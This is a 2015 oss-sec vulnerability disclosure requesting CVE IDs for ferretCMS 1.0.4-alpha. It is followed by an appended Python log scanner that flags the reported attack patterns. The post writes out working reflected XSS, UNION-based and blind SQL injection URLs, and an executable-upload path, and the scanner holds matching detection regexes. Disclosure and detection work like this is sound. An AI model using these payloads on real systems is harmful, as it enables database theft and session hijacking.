oss-sec mailing list archives
CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple reflecting/stored XSS- and SQLi-vulnerabilities, unrestricted file upload
From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Fri, 23 Jan 2015 07:14:56 +0100
Hi Josh, Steve, vendors, list.

I found multiple reflecting/stored XSS- and SQLi-vulnerabilities as well as an unrestricted file upload in the CMS ferretCMS v.1.0.4, which is currently in the alpha development stage.

============
Reflecting XSS
============

http://{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

============
Stored XSS
============

1. via login-form of the administrative backend, input field for username:

http://{TARGET}/admin.php

executed here in the logevent functionality in the backend:

http://{TARGET}/admin.php?type=log&action=read

2. via the new blog-post form, input field for pagetitle:

http://{TARGET}/admin.php?type=page&action=insert&p=

executed, for example, here:

http://{TARGET}/admin.php?type=page&action=read

============
SQLi
============

http://{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+

http://{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+

http://{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+

http://{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+

http://{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+

http://{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+

http://{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+

==================
Unrestricted file upload
==================

An administrator has the opportunity to upload arbitrary files via a form located here on a common ferretCMS installation:

http://{TARGET}/admin.php?type=uploader&action=upload

As these files aren't renamed and are stored in the following location, any unauthenticated user is able to read/execute those files, too:

http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE}

Could you please assign a CVE-ID / CVE-IDs for these issues?

Thank you very much!

Greetings,

Steffen Rösemann

References:

[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS
[5] http://seclists.org/fulldisclosure/2015/Jan/98
[6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html
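As an added defender's example (not part of Steffen's post or of the ferretCMS project): a small Python scanner that runs over constructed web-server access-log lines and flags requests matching the three issue classes the report lists for `admin.php` and `/custom/uploads/`. It checks every query parameter rather than only `action` and `p`, so it generalizes slightly beyond the exact URLs above; the log lines, IPs and file names are constructed sample data.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not taken from the advisory); the
# request paths mirror the patterns the report lists for ferretCMS admin.php.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jan/2015:07:14:56 +0100] "GET /admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 512
10.0.0.5 - - [23/Jan/2015:07:15:01 +0100] "GET /admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+ HTTP/1.1" 200 1024
10.0.0.7 - - [23/Jan/2015:07:15:09 +0100] "GET /admin.php?type=page&action=read HTTP/1.1" 200 2048
10.0.0.9 - - [23/Jan/2015:07:16:00 +0100] "GET /custom/uploads/example.php HTTP/1.1" 200 77
10.0.0.9 - - [23/Jan/2015:07:16:05 +0100] "GET /custom/uploads/logo.png HTTP/1.1" 200 4096
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request target in a log entry
# UNION-based and substring(version()) probes, as listed in the report.
SQLI_RE = re.compile(r"\bunion\b.+\bselect\b|\bsubstring\s*\(\s*version\s*\(", re.I)
XSS_RE = re.compile(r"<\s*script\b", re.I)
# Server-side-executable extensions inside the unrenamed upload directory.
UPLOAD_EXEC_RE = re.compile(r"^/custom/uploads/.+\.(?:php\d?|phtml|phar)$", re.I)

def classify(line):
    """Return finding tags for one log line (empty list if nothing matched)."""
    m = REQ_RE.search(line)
    if not m:
        return []
    url = urlparse(m.group(1))
    # parse_qs percent-decodes and maps '+' to space, so payloads are inspected decoded.
    params = parse_qs(url.query, keep_blank_values=True)
    tags = []
    if url.path == "/admin.php":
        page = params.get("type", ["?"])[0]
        for values in params.values():
            for value in values:
                if SQLI_RE.search(value):
                    tags.append(f"sqli:{page}")
                if XSS_RE.search(value):
                    tags.append("xss")
    elif UPLOAD_EXEC_RE.match(url.path):
        tags.append("upload-exec")
    return sorted(set(tags))

def scan(log_text):
    """Return (1-based line number, tags) for every line with a finding."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            findings.append((n, tags))
    return findings
```

The `sqli:<type>` tag records which `admin.php` component was probed, which is useful when deciding where to add parameterized queries first.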